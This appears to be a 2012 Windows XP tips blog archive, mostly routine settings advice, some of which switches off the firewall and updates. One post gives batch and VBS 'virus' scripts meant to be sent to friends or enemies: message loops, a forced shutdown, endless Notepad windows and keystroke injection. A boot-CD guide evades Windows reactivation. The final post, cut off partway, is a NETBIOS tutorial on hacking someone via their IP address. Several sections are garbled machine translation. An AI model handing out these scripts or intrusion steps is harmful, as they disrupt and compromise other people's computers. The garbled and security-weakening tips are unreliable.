Friday 30 November 2012

Stop Password Expiration

After you have run Windows XP for a while, you may receive this message when you
log on: "Your password will expire in 14 days.....".
By default, Windows XP is set up with passwords which will expire after 42 days. 14
days in advance, Windows will start warning you of this fact. If you do not want your
passwords to expire:

1. Go to Start > Run and in the Open: box type control userpasswords2
2. Select the Advanced tab in the User Accounts window
3. Press the Advanced button below the Advanced user management header
4. Select Users in the Local Users and Groups
5. In the right pane, right-click the user name for which you want to change the
setting, and select Properties
6. On the General tab, check Password never expires
7. Click Apply and OK (all the way out)

Safely Remove Hardware Icon

If you have an USB device attached to your system, you will notice an icon in the
Notification area, which - when clicked - will give you the option to Stop your
hardware, before you unplug it.
It is possible that you never unplug this hardware. So how do you get rid of the icon?
As far as I know the only way is to right-click the notification area, and selecting
Properties. Under the Notification area heading, click Customize. Find the Safely
Remove Hardware icon and select Always hide in the Behavior column next to it
(press OK and Apply to back out).

Multi user features

Like Windows 2000, but unlike Windows 95, 98, and Me, the ability to log in multiple
users simultaneously plays a big role in Windows XP. There is a default Administrator
account set up when Windows XP is first installed, but you can create as many
accounts as you need later, depending on how many people will be using the
machine. Each user, once he or she has an account, can customize XP to his or her
liking. Individual users get their own subfolders in the Documents And Settings
folder; this folder serves as a centralized location for most personalized information,
such as the Start Menu, Favorites, and Documents settings.

Show yourself

Only the Administrator can set up new user accounts (go to Control Panel > User
Accounts > Create A New Account). You can select a picture to identify the account.
When you're logged on to the system under your username, this picture, along with
your username, peeks out at you from the top of the Start menu. There are a slew of
48x48-pixel bitmap images to choose from within XP. They're housed in
D:\Documents And Settings\All Users\Application Data\Microsoft\User Account
Pictures\Default Pictures. But why limit yourself? You can also copy any graphic you
want into this folder or browse for another from your hard drive. Usable file types are
BMP, GIF, JPEG, or PNG. However, always use a square picture, to limit the white
space on the side. Your image can be any size but will be displayed as 48x48-pixel
image, so a close-up works best.

Hide yourself

Once you've created a user account, password-protect it to keep other users from
viewing your files, Favorites, and cookies. Why? You may not want your child to see
the note that you're sending to his or her teacher, or you may be planning  someone's surprise party.

(Note: Anyone with an Administrator account can still see them.)

Worried about remembering your password? Create a hint to help you when you
initially create it by following the prompts during setup. XP stores the password hints
in the Registry at Hkey_local_machine\Software\Microsoft\Windows\Current Version\Hints.
What if the hint doesn't help? Any user or Administrator can create a password reset
disk, which you can use to log on and create a new password. Go to Control Panel >
User Accounts and select "Prevent a forgotten password" in the Related Tasks box on
the left. Follow the wizard's instructions. After creating the disk, find a safe place for
it. Don't forget the password or where you put the

Thursday 29 November 2012

Not A Tweak, But A Double XP Surprise!

Neither Win2K nor WinME has the ability to create a simple, basic, DOS- based boot
floppy (a "startup disk") unless you jump through hoops or do things in nonstandard
ways. Because XP is the fusion of Win2K and Win9x/ME, I assumed it would follow
the same "no boot floppy" tack. But instead, I was surprised to poke around in XP
and see that the format option there does indeed offer a "Create MS-DOS Startup Disk."

As an experiment, I created a startup disk, and all went smoothly. I was able to use
the disk to boot my PC without any problems. But when it started up, I got the
second surprise. The DOS boot message showed "Microsoft Windows Millennium." To
confirm this, I typed "Ver" to see what version of DOS was running, and the screen
showed: Windows Millennium [Version 4.90.300]

Although it's very strange to see the WinME startup message on an XP-created
floppy, all this means is that Microsoft cribbed a few essential DOS boot files from
WinME, and made it so XP can drop them onto a freshly- formatted floppy for you.
I'm glad they did: It's a very good thing that Microsoft restored the ability to make a
simple boot disk.

Display the Sharing Tab in Folder Properties

In Windows 2000, getting to the Sharing options for a folder was simple: Just right click,
choose Properties, and you'd see a Sharing tab. In Windows XP, this feature is
missing by default, but you can make the system display the Sharing tab if desired.
Simply open up Folder Options (My Computer, then Tools, Folder Options) and
navigate to the View tab. In the Advanced Settings section, scroll down to the
bottom and uncheck Use simple file sharing (Recommended), a Mickey Mouse
feature if there ever was one. Now share your folders on the LAN as you would in
Windows 2000.

Try automatic camera recognition in windows xp

If you have a digital camera, try this trick for downloading pictures to your machine.
Don't load any of the drivers or software that comes with your digital camera.
Instead--if your camera supports USB--connect your camera via a USB port. There's
a good chance that Windows XP will recognize the digicam. After a few moments, the
Scanner And Camera Wizard should start up and walk you through the steps
involved in copying your pictures from the camera to a folder of your choice on your
computer--much faster than doing it manually. You may still need to install your
camera's software if it provides configuration controls you can't access in any other
way, such as those for changing the picture resolution on your camera or the
software's special editing functions.

Disable Automatic Windows Update

Windows XP is configured out of the box to routinely scan for and download updates
to Windows XP automatically. While this can be somewhat convenient for those with
very fast Internet connections and those who would otherwise forget to check for
updates, it can be a nuisance for the rest of us, who are still using 56k or, even
worse 33k modem connections.
To control or disable automatic updating, open the System icon in Control Panel (or
right-click My Computer and select Properties), and choose the Automatic Updating tab.
To check for updates manually, open Internet Explorer and select Windows Update
from the Tools menu.

My Computer Won't Shut Down Itself After Installing XP

There are a number of users who have been complaining that their PC will no longer
automatically power down/shut off without pressing the power off button on the
computers unlike in Windows Me/95/2000. There could be a number of reasons for
this - but the main one seems to be that ACPI is not enabled on the computer or in
Windows XP. Here is how to enable it:
1. Click - Start - Control Panel - Performance and Maintenance - Power Options Tab
2. Then click APM - Enable Advanced Power Management Support

Automatically defrag drives with a new context menu item

Create a new Registry import file named context_defrag.inf in Notepad (be sure to
save with it with the Save as type set to All Files and not Text Documents) and place
the following text inside:
; context_defrag.INF
; Adds Defrag to the right click context menu in Windows XP
[version]
signature="$CHICAGO$"
[DefaultInstall]
AddReg=AddMe
[AddMe]
HKCR,"Drive\Shell\Defrag\command",,,"DEFRAG.EXE %1"
Then, right-click and choose Install. This will add a context menu to XP that allows
you to automatically defrag drives, using the command line version of the built-in
defragmentation utility. To use it, navigate to a drive in My Computer, right-click,
and choose Defrag. A command line window will appear, and that drive will be
defragged. When it's complete, the window just disappears.

Missing Administrator account

Once you have created regular user accounts, the default Administrator account
vanishes from the Welcome screen, which you see when the computer starts up.
Press Ctrl-Alt-Delete twice at the Welcome screen to retrieve the standard logon
dialog. You can log on as Administrator from here. To switch among accounts, just
click the Log Off button on the Start menu. You'll then see the Log Off Windows
dialog box. Click the Switch User button, and you'll be taken to the Welcome screen
where you can select and log on to other accounts.

Monday 26 November 2012

Disable error reporting

 • Open Control Panel
• Click on Performance and Maintenance.
• Click on System.
• Then click on the Advanced tab
• Click on the error-reporting button on the bottom of the windows.
• Select Disable error reporting.
• Click OK
• Click OK

Adjust various visual effects

 1. Open up the control panel
2. Go under system and click on the advanced tab
3. Click settings under Performance options
4. You can now change various graphical effects (mainly animations and
shadows)

Tuesday 20 November 2012

Speed up the Start Menu

The default speed of the Start Menu is pretty slow, but you can fix that by editing a
Registry Key. Fire up the Registry Editor and navigate to the following key:
HKEY_CURRENT_USER \ Control Panel \ Desktop\Menu Show Delay
By default, the value is 400. Change this to a smaller value, such as 0, to speed it up.
If this doesn't work for some reason, then you might try the following: Navigate to
Display Properties then Appearance then Advanced and turn off the option titled
Show menu shadow. You will get much better overall performance.

Turn of CD Auto Play

• Open My Computer
• Right click on your CD ROM and choose Properties
• Click on the Auto Play tab
• In the drop down box you can choose the Action for each choice shown in the drop down box
  Or
1. Go to Start->Run->gpedit.msc
2. Computer Config -> Administrative Template -> System
3. Double click Turn off Autoplay
4. Enable it.

Remove shortcut arrow from desktop icons

Here's how you can remove those shortcut arrows from your desktop icons in Windows XP.
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOTlnkfile
3. Delete the IsShortcut registry value.
You may need to restart Windows XP.

Close Multiple Windows : Note works in all versions of Windows

If you just opened a number of separate, related windows (a folder inside a folder,
and so on), there's an easier way to close them all than one-at-a-time. Hold down
the Shift key as you click the X caption button in the upper-right corner of the last
window opened. Doing so closes that window and all windows that came before it.

Disable error reporting

• Open Control Panel
• Click on Performance and Maintenance.
• Click on System.
• Then click on the Advanced tab
• Click on the error-reporting button on the bottom of the windows.
• Select Disable error reporting.
• Click OK
• Click OK

WinXP Clear Page file on shutdown

Go to Control panel Administrative tools, local security policy. then go to local policies
---> security options. Then change the option for "Shutdown: Clear Virtual Memory Pagefile"

Win XP Won’t Completely Shutdown

• Go to Control Panel, then go to Power Options.
• Click on the APM Tab, then check the "Enable Advanced Power Management support."
• Shut down your PC. It should now successfully complete the Shut Down process.

Enable / Disable Firewall

Open Control Panel and double click on Network Connections. In the new box that
appears right click on the Connection and click on the Advanced tab. Check or
unchecked the box according to your desire.

Turn Off System Recovery

Right click on My Computer and choose Properties. Click on the System Restore tab
and check the box Turn off System Restore. (This will increase Windows performance
& save disk space)

Sunday 18 November 2012

Turn on your firewall

Microsoft included a firewall in Windows XP to keep you safe from hackers while you
cruise the Internet. How do you know that the Internet Connection Firewall is on? Go
to the Control Panel and double-click the Network Connections icon. In the dial-up,
DSL, or cable connection dialog that appears, check the Status column. If your
firewall is on, it should say Firewalled. You can turn the firewall off with the check
box, but unless you are going to add a third-party firewall for heightened security,
it's best to leave it on.
Now that you know that your firewall is on, how do you know that it's doing its job?
Test it with ShieldsUp, the free testing service sponsored by Gibson Research.
According to our tests, XP's Internet Connection Firewall kept the computer in full
stealth mode. Hackers could not break in and couldn't even see the computer online.
But, given the latest security problems with USB 2.0, etc, you should always go to
Windows Update to make sure you have the latest patches, no matter what
operating system you use.

Watch your cookies

In XP, the Documents And Settings folder holds all user information, including
configuration settings, favorites, and cookies. The Documents And
Settings\Username\Cookies folder is where XP stashes cookies. How do you control
the number of cookies you allow on your system? Click Start > Control Panel >
Network And Internet Connections > Internet Options. Click the Privacy tab, then
use the slider bar to modify your cookie settings. For instance, you can block cookies
from sites that use personal identification without your consent. To increase your
security, try out the other privacy settings in this dialog. The lowest level is Accept
All Cookies while the highest is Block All Cookies, with low, medium, medium-high,
and high settings in between. (An explanation of each appears as you move between
settings.) Keep in mind that rejecting cookies may limit your actions on some Web
sites, and some sites use cookies to track how many times you see a popup, for
example, on this website, if you blocked cookies, you would see a popup on every page.

Group and Ungroup Similar Taskbar Items

Just open three or four Internet Explorer windows and you won't see them all in a
row on your Taskbar, as you did in previous versions of Windows. By default,
Windows XP groups similar items on one button. For example, if you have 3 Internet
Explorer windows open, you'll see an Explorer item with the number 3 on it. Click it
to see a pop-up list of those windows, then select the one you want.
If you would like, Windows XP will display all open windows separately on the
Taskbar. Right click a blank area of the Taskbar and select Properties. Under Taskbar
Properties, deselect Group Similar Taskbar Buttons, then click OK.

Friday 16 November 2012

Protect your identity

Like many other audio players, Windows Media Player rushes out to the Internet to
find information for you when you play a CD. Some of this information, such as song
titles and album art, is useful, but Media Player also identifies your copy of Media
Player to the site where it's getting data. Why? According to the help file, "The server
uses this unique identifier to monitor your connection. By monitoring your
connection, the server can make adjustments to increase the playback quality and to
alert you about events that occur when receiving streams over the Internet."
If you're disturbed by this exchange of information, here's how to stop it. In
Windows Media Player, click Tools > Options and go to the Player tab. Notice the
option that says "Allow Internet sites to uniquely identify your player?" Turn it off.

Know your rights

Windows XP comes bundled with Windows Media Player 8.0. While Media Player
plays just about any digital media file format--it supports 35, including MP3, it
records music only in the Windows Media Audio, or WMA, format. The reason?
Content protection.
When recording, or ripping, music from CDs, Media Player allows you to make
protected recordings so that no one will be able to copy the recording from one
computer to another. You can turn copy protection on or off on the Copy Music tab
by checking or unchecking the box that says Protect Content.

Change Out Your Pointer Scheme

Tired of seeing your pointer as an arrow or an hourglass all the time? Windows XP
offers a number of alternative pointer schemes, such as Dinosaur, Ocean and Sports.
Open the Control Panel, double-click Mouse, and select the Pointers tab. (If you start
in Category view, select Appearance and Themes, then click Mouse Pointers under
"See Also.") Next to Schemes, click the down arrow and select a scheme to preview
its pointers. Click OK to apply the scheme to your desktop. Simple as that.

Tuesday 13 November 2012

The Best Computer Tips And Tricks

Keyboard Shortcuts for Windows Vista and XP and Microsoft Office
 
Windows Key+E
The best part about shortcut keys is letting your keyboard do half the work. This is a perfect example: This shortcut allows you to open Windows Explorer with one quick keystroke.

Windows Key+M
This is the shortcut to keep in mind when you are at work doing anything but working—it allows you to minimize all of your open windows, leaving just the desktop left exposed. To restore the windows, hit Windows key+Shift+M. Another quick way to do this is Windows key+D, which shows your desktop; to restore, just repeat the same keystroke. This is a handy shortcut to have around the next time your boss is wandering through the office.
 
Alt+Tab
This allows you to easily scroll through all the windows you have open. If you're working in Word and referring to something in Explorer, for example, you can toggle back and forth between the two programs. You can also use this to switch between windows in the same program, making multitasking a breeze. Very similar is Windows key+Tab: In XP, it lets you scroll the items on the taskbar, and in Vista, it starts Flip 3D for a fun graphical spin on the same idea.

Alt+F4
This shortcut is a quick way to close a window in any program. Alt+Spacebar+C (which requires less stretching, but more keys) and Ctrl+W do the same thing. Any of the ways will allow you to close a window without using your mouse to hit the X in the upper-right corner. 

Ctrl+Arrow Keys
In Microsoft Word, the left and right arrows allow you to move the cursor to the beginning of the previous word or the next word; the up and down arrows will do the same with paragraphs. This is very helpful when editing a document or scanning for any reason.

Shift+Delete
f you want to delete a file—and you don't want to deal with it later in the Recycle Bin—this is the way to go. Just be absolutely sure that this is a file you won't want back!
 
Hold Shift While Inserting a CD
Have you ever wanted to insert a CD and not use it right away? This shortcut allows you to bypass Autorun when inserting a CD so you can control exactly when you will use a CD you've inserted.
 
Ctrl+Drag
There are many ways to copy a file, but this just might be the easiest. All you have to do is click on the file, hold, and drag it into its desired location. This works the same as another handy shortcut, Ctrl+C.
 
Windows Key+U+UQuickly shut down Windows by hitting the Windows key (don't hold it down), hitting U to reach the shutdown menu, and then hitting U again to shut down.
 
Windows Key+PauseNeed a quick way to get to the Systems Properties menu without too much thought? Just press these two keys and you'll be brought right to it. 

Ctrl+Z, Ctrl+Y
Undo an action by hitting Ctrl+Z; if you change your mind, Ctrl+Y will redo the undo.

Shift + Arrow Keys
Holding shift and pressing one of the arrow keys will highlight text in Word (or a group of Excel cells) without the mouse, selecting in the direction the arrow points.

Ctrl+U, Ctrl+B, Ctrl+I
This one's for Office newbies. It's a snap to underline, bold, and italicize without the mouse if you press Ctrl+U (underlining), Ctrl+B (bolding), or Ctrl+I (italicizing).

Any Folder As a Photo Folder

This tricks shows you how to setup any folder to display its contents as a photo folder. In many cases, you save your images/photos in a folder different than "My Pictures" (under "My Documents"). Since this folder you choose is just like any other normal folders, its contents displayed as a listing of files. You can temporary change it by just right-click and select "View" >> "Thumbnails". But if you want to change the folder so that everytime you come back, the folder itself, as well as all its subfolders, display the contents as photo thumbnails.

Here's How


Right-click on the folder you choose and select "Properties"















Select "Customize" Tab. Then under "Use this folder type as a template", select "Pictures (best for many files)"




















Check on "Also apply this template to all subfolders" to apply the setting to subfoders as well




















Click OK to exit

Wednesday 7 November 2012

NOTEPAD VIRUS CODES

1. Cycle a message in your friend's computer:
open notepad and Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as Anything.BAT and send it to ur frenz or enemy.

2. Convey your friend a lil' message and shut down his / her computer:
Type :
wx@echo off
msg * I don't like you
shutdown -c Error! You are too stupid! -s
 Save it as Anything.BAT in All Files and send it.

3.Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32
otepad.exe
GOTO top

Save it as Anything.BAT and send it.

4.Hack your friend's keyboard and make him type You are a fool simultaneously
Type :
Set wshShell = wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys You are a fool.
loop

Save it as Anything.VBS and send it.

Manage Windows XP Boot Disk

Windows XP users must create a boot XP operating system CD to troubleshoot for problems with the installation of Windows. CD of boot Windows XP will allow you to start the computer if the boot sector is corrupt or damaged, and the computer will not boot up. Create a boot CD from an existing installation of Windows XP is not a terribly complicated process

Instructions:-

1.    Create a folder called "XPSetup" at the root of the c: drive.

2.    Download and unzip the boot sector of the download location provided files (see resources). Copy all the files in the new XPSetup directory.

3.    Click on the "Start" button and select "Explorer" to open Windows Explorer. Search the directory c:/i386 using the browser. If the i386 directory can be found in the root directory, take a look in the Windows directory in the root directory.

4.    Highlight the directory/i386 and click the folder.

5.    Select "copy" (not "move") in the contextual menu and paste the folder in c:/XPSetup. Do not drag and drop the folder. The folder structure must be as folder c:/XPSetup/i386 that stick in the installation directory. Verify that files are copied and not moved by checking its contents i386 folder.

6.    Open Notepad and create a new text file. In a new text file, type the word "Windows" capital "" and the rest of the lowercase letters. Contain spaces, but does not include the quotation marks around the words "Windows". Press "Enter" to create a new line.

7.    Save the file as "WIN51" with quotation marks. Add quotes will prevent the .txt extension added to the file name with. The content should be available a file named WIN51 with Windows text (including spaces).

8.    Copy and rename the WIN51 file, as specified for your operating system. Each service Pack installed XP will create a separate file. Follow the instructions below:

Windows XP Home without service packs: copy and rename the file WIN51IC.

Windows XP Home, Service Pack 1: in addition to the file named WIN51IC, copy and rename the WIN51 WIN51IC file. "SERVICE PACK 1".

Windows XP Home Service Pack 2: in addition to the files named WIN51IC and WIN51IC."SP1, copy and rename the file WIN51 WIN51IC."SP2 "."

Windows XP Professional without any service packs: copy and rename the file WIN51IP.

Windows XP Professional, Service Pack 1: in addition to the file named WIN51IP, copy and rename the WIN51 WIN51IP file. "SERVICE PACK 1".

Windows XP Professional with Service Pack 2: in addition to the files named WIN51IP and WIN51IP.SP1, copy and rename the WIN51 WIN51IP file.SP2 "."

9.    Copy all WIN51 files in c:/XPSetup.

10. Open the application, Easy CD Creator, and create a new project.

11.
Select "Burn" > "Bootable CD" in the menu on the top navigation bar.

12. Change the volume name for the new CD project according to the version of Windows XP:

Release tag

Windows XP Home OEM-WXHOEM_EN

Windows XP Home SP 1 OEM-XRMHOEM_EN

1St Windows XP Home SP and SP 2 OEM-X1AHOEM_EN

Windows XP Professional OEM-WXPOEM_EN

Windows XP Professional SP 1 OEM-XRMPOEM_EN

1St Windows XP Professional SP and SP 2 OEM-X1APOEM_EN

 13. Copy all the following files in the directory XPSetup to prevent the reactivation of Windows, if you use the boot disk:

C:\windows\system32\oembios.bin

C:\windows\system32\oembios.dat

C:\windows\system32\oembios.GIS

C:\windows\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oembios.cat

14. Easy CD Creator interface, need to add the whole folder c:/XPSetup.

15. Insert a blank CD and click "Burn". Create a bootable Windows XP CD.

16. Start of test CD. Shut down the computer with the CD in the CD burner. Start Windows XP, and then press the F12 key during startup. It is a list of boot options. Select "boot from CD". The team must start from the CD if run all the steps correctly.

Fix A Slow Running Computer

It can be trying to fix your computer runs slow, also many people are fighting for the same problem. It is the same old story, the purchase of a new team, to go for a few months and then it seems that night that the team decides to take his beloved old time burden for any program. This is actually something very frustrating, but there are solutions and attempts to repair a slow computer do not require a degree in computer science.

Repair slow computer needs only some know how and your patience. There are some basic things you can do to significantly accelerate your PC. Here are some to help you on your free much faster way, computer experience of stress.

After the first systematically delete temporary Internet files. These Internet files can be added very quickly as browsing the Web and also about many of these files can slow the performance of the computer. You can easily remove these files by using the disk cleanup tool.

Secondly, to repair a slow computer eliminate elimination programs start. These programs is developed each time you start your computer, wasting valuable time waiting to completely load Windows. This process may take from 5 to 15 minutes! But if several unnecessary programs are disabled when booting the computer, can significantly reduce the time needed to load Windows.

 Something I can do to help with the speed of your computer is check and correct all errors on the drive. Everyday errors on the hard drive, the negative impact on the performance of your computer may collect through the team. Simply go to my computer and then click drive c. click Select properties and then tools. Click on the "now" to begin the process. This significantly increases performance.

Remove Fake Antivirus Malware

Guide to remove the fake antivirus malware
There are many types of malware currently circulating anti-virus Rouge there, one of those famous is as follows. Anti-virus live virus if your infected, when you remove it, in fact, that would be difficult.

Many such viruses are present on the Internet pose them. are taken hostage and as a live anti-virus on your computer, a warning message indicating that your computer is infected with the virus given, you have to remove it, they must be registered in order to get. .

Tricky part is that the virus of these types of block because of all kinds, including the removal tool malware most famous, of an attempt to remove them, how to remove them;. and we are prepared guide you It helps to remove the infection of these fake anti-virus for you.

 General guidelines:

In several steps you can follow to you, you have to remove the / fake anti-virus.
·         Please use a portable version of SuperAntiSpyware to remove anti-virus

·         The first step is,if you want to use SuperAntiSpyware, run it again does not work restart in Saf Mode.

·         If that does not work then try using Safe Mode to Reboot of ComboFix

·         To install Malwarebytes, do a full system scan

·         Perform a full scan and then restart using the anti-virus software is installed then.

 Guide to remove the antivirus live:

1.      Restart in Safe Mode by pressing the F8 key as soon as you start before the window, select the Network and the Safe Mode.

2.      You will need to modify your Internet connection for your anti-virus live in order to prevent you from using the change is nothing of all your Internet settings.

3.      And then Internet Options, go to the setting of LAN, use the Bypass proxy server for local addresses check box.

4.      Install SuperAntiSpyware You are in Safe Mode, you can download from the Internet.

5.      After installing the program, so you click Check for Updates button in order for it to get the latest definitions, open the window to update, run the rapid analysis of the system. .

6.      Click once an update is made ​​scan to select all drives to scan by clicking the button of your computer.

7.      Take quite a lot of time you can scan is finished, and only then, proceed to remove the virus from your computer.

8.      Make sure that you restart the computer removal is complete, you start back into safe mode.

9.      After you reboot back to safe mode, you just installed, the Malwarebytes please update it to get updates and the latest. run a full system scan after the update.

10.  Malwarebyte is sniffing malware than many have missed is superantispyware. . Then, please click Remove to remove them entirely from the system.

11.  And then restarts, the installation system and Microsoft Security Essentials is not, run another scan to make sure that it is not malware are left.

 Go there to finish it guide. how to remove the antivirus fake from your computer to verify that has been updated with the latest definitions always the anti-virus software to prevent infection from spyware, all why these It is annoying to perform these steps, malware and fake anti-virus.

Tips For Firefox

Our previous article 5 we mentioned tips to give a different meaning entirely new browsing of Firefox. Hint, also, to facilitate it to browse the Internet, to manage the tab for you Lets use a shortcut.

In this article, I will present some more browsing of Firefox tips and much easier to enjoy browsing in Firefox, that.

1.Open the search for a new Firefox tab:
You are, whenever you want to create a new search must be frustrating always, open a new tab. So now, you can create a search to create a new search in new tab by pressing the key old to enter + not only, please enter the key.

You are, if you want to create a new search tab by default, perform the following steps. :

Type : Set about in the address bar of your browser

The window, as follows: after opening the filter box type browser, search, open in tab.

Double-click the value you want to change this to true.

2.To disable the Close button tab:
So close to the actual Close button, when you open multiple tabs, it can display a tab without closing it by mistake is very difficult. [Close] button so that you can now to, you can customize the Firefox off instead, you can have a single Close button on the right side of the tab bar.

If you are not using the Tab Mix Plus extension, perform the following operations:

·         Type : Set about in the address bar of your browser

·         By entering, filter browser.tabs.closebuttons

·         Set the tab close button on the right side of the tab bar to move the value to which 3.

If you are running Tab Mix Plus extension , and then perform the following steps. :

·         Tab Mix Plus opens the option to select / display tab

·         Please check the check box of the tab close button to clear the check box

3.To disable tab scrolling of Firefox:
Annoying feature one of the Firefox tabs, tab scrolling is aggregates all are open.

If you're using an extension of the Tab Mix Plus, you will need to use multiple rows of tabs is very useful.

·         Tab Mix Plus is moved to an optional tool

·         You can also select to display the tabs and drop-down menu changes, from more than one line, you can select the maximum number of rows to display. .

Tab Mix Plus If you are not using an extension, to disable this, perform the following steps. :

·         Type : Set about to address bar

·         By entering, filter browser.tabs.tabMinWidth

·         To disable this feature to set the option of completely 0

4.Tab is commonly used to save space of the tab:
You, the tab is always the same always, if it is open to the other tabs, so as to give more space and take less space they are more open you are, but to reduce them is wise. To do this, you will need to install FaviconizeTab extension.

You can configure this extension in order to reduce the tab based on the URL. .

·         Right-click faviconize from the menu

·         And auto, enter the URL of the page and leave you faviconize always open in the tab. Select the enable

·         The tabs that are commonly used, currently, will be displayed each time you open it as an icon.

5.Shortcut key for closing a specific tab:
If you are using multiple tabs, is done by taking the mouse pointer you instead Close button, to close the tab, you need a quick way. Shortcut to achieve the key is Oshite

In the Ctrl key + the close a particular tab is on the top you.


Everyday Computer Tips

These tips work for Windows XP, Windows Vista and Windows 7.
Change the time on computer: right mouse click on the clock in the tray of the system (bottom right) or click with the right button in the system tray and choose "adjust date / time".

To save an image from a web page, right mouse click in and select "save image as". You can change it at this time too.

To see how much hard/unit hard drive disk space left, do the following: double-click my computer. right mouse click the C drive (or any hard disk drive) and choose Properties.

Most common image formats are JPG, GIF, BMP and PNG. Most common image format exported from a digital camera is a JPG.

If you accidentally delete a file, click on key Ctrl + Z again instantly. You can also search the Recycle Bin If you don't realize that until later, then, simply click with the right button on the file and choose "restore" and will return to where it came.

If holding down the SHIFT key to delete a file, it omits the Recycle Bin. Control z will still have to return.

If occasionally appears a red x instead of an image in a web page, it is not a problem with your browser settings. It is usually means the webmaster who made the page puts a link wrong.

F1 key opens Windows help quickly!

It can quickly maximize a window by double clicking in the title bar of the window… is the large blue long area in the upper part of the window. Double click again to return to the size was before to maximize.

Alphabetically order items on the start menu, click Start, click programs, and while holding the pointer over any program, right mouse click in and select to sort by name.

Quick view of the system: if holding down the Alt key while double-clicking on my PC, the System Properties window opens. This is where you can find the computer name, restore system, automatic updates, hardware and more. Will the first screen "general" show you lots of information about your system such as which version of Windows you are using, the team is registered, how fast your CPU is and how much RAM you have.

Speedup Computer Tips

My computer is running more slowly. Because mediocre results, this causes my PC work inordinately. How to speed up my computer? To avoid this nasty problems, I'm thinking some need to buy a new team instead is slow. But now it is so expensive to me. Fortunately, you can find tips, which can actually speed up my computer without having to buy a new compute

 1. Remove unnecessary temporary files can speed up your computer
These files can eat up valuable space on hard drive with the time and the slower equipment. In order to speed up your computer, you can download and install registry easy. Please click on the "Scan Now", then you can activate, can safely delete temporary files without deleting data required by the team 

2. Clean the registry that can speed up your computer
 Every time you uninstall a program, there are some remaining files on the computer, for example, your entries, configuration, configuration, etc. still were in the Windows registry. Unfortunately, computer users don't realize that the operating system Windows will read these incorrect registry entries of load of programs that do not exist in General during these wasted things overloaded at the time, the team will run more slowly. Fortunately clean registry errors through the free registration of filter or tool of record that can help delete the configuration of these unwanted elements, as well as repair the registry errors. This will help accelerate the team immediately.  

3. Defrag hard drives, can speed up the team.
To install or remove a program on the computer, this will create some incorrect files that are distributed through the hard disks into pieces. Will he time to load the data in the operating system of the computer.? Why is the computer slow.? How to speed up your computer? Defragment the disks fragment, you can speed up data access time. Just follow the step by step guide to perform this task on the computer. Click Start > all programs > Accessories > system > Disk Defragmenter tool 

4. Remove Programs unwanted in the background and run, you can speed up the team.
In order to speed up your computer, simply click on start > Control Panel > add or remove programs > discover the unnecessary programs > click Delete These processes can help to release the hard drive and improve the performance of your computer.

Sunday 4 November 2012

How to hack someone with his IP address

Introduction. Welcome to the basic NETBIOS document created by aCId_rAIn. This document
will teach you some simple things about NETBIOS, what it does, how to use it, how to
hack with it, and some other simple DOS commands that will be useful to you in the
future.
 
1. Hardware and Firmware
1a. The BIOS
The BIOS, short for Basic Input/Output Services, is the control program of the PC.
It is responsible for starting up your computer, transferring control of the system to
your operating system, and for handling other low-level functions, such as disk access.
NOTE that the BIOS is not a software program, insofar as it is not purged from
memory when you turn off the computer. It's
firmware, which is basically software on a chip.
A convenient little feature that most BIOS manufacturers include is a startup
password. This prevents access to the system until you enter the correct password.
If you can get access to the system after the password has been entered, then there
are numerous software-based BIOS password extractors available from your local
H/P/A/V site.
NETBIOS/NBTSTAT - What does it do?
 
2. NETBIOS,
also known as NBTSTAT is a program run on the Windows system and is
used for identifying a remote network or computer for file sharing enabled. We can
expoit systems using this method. It may be old but on home pc's sometimes it still
works great. You can use it on your friend at home or something. I don't care what
you do, but remember, that you are reading this document because you want to learn.
So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there
are two ways, but one's faster
Method 1:Start>Programs>MSDOS PROMPT>Type NBTSTAT
Method 2:Start>Run>Type Command>Type NBTSTAT
(Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)
Ok! Now since you're in the DOS command under NBTSTAT, you're probably
wondering what all that crap is that's on your screen. These are the commands you
may use.

Your screen should look like the following:

NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer
NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts
Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds between each display.
Press Ctrl+C to stop redisplaying
statistics.
C:\WINDOWS\DESKTOP>
The only two commands that are going to be used and here they are:
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.

3.Host Names.
Now, the -a means that you will type in the HOST NAME of the person's computer
that you are trying to access. Just in case you don't have any idea what a Host Name
looks like here's an example.
123-fgh-ppp.internet.com
there are many variations of these adresses. For each different address you see
there is a new ISP assigned to that computer. look at the difference.
abc-123.internet.com
ghj-789.newnet.com
these are differnet host names as you can see, and, by identifying the last couple
words you will be able to tell that these are two computers on two different ISPs.
Now, here are two host names on the same ISP but a different located server.
123-fgh-ppp.internet.com
567-cde-ppp.internet.com

4.IP Addresses.
You can resolce these host names if you want to the IP address (Internet Protocol)
IP addresses range in different numbers. An IP looks like this:
201.123.101.123
Most times you can tell if a computer is running on a cable connection because of the
IP address's numbers. On faster connections, usually the first two numbers are low.
here's a cable connection IP.
24.18.18.10
on dialup connections IP's are higher, like this:
208.148.255.255
notice the 208 is higher than the 24 which is the cable connection.
REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS.
Some companies make IP addresses like this to fool the hacker into believing it's a
dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway Thisgives you an idea on IP addresses which you will be using on the nbtstat command.

5. Getting The IP Through DC (Direct Connection)
First. You're going to need to find his IP or host name. Either will work. If you are
on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname
without parenthesis. you will either get a host name or an IP. copy it down. If you do
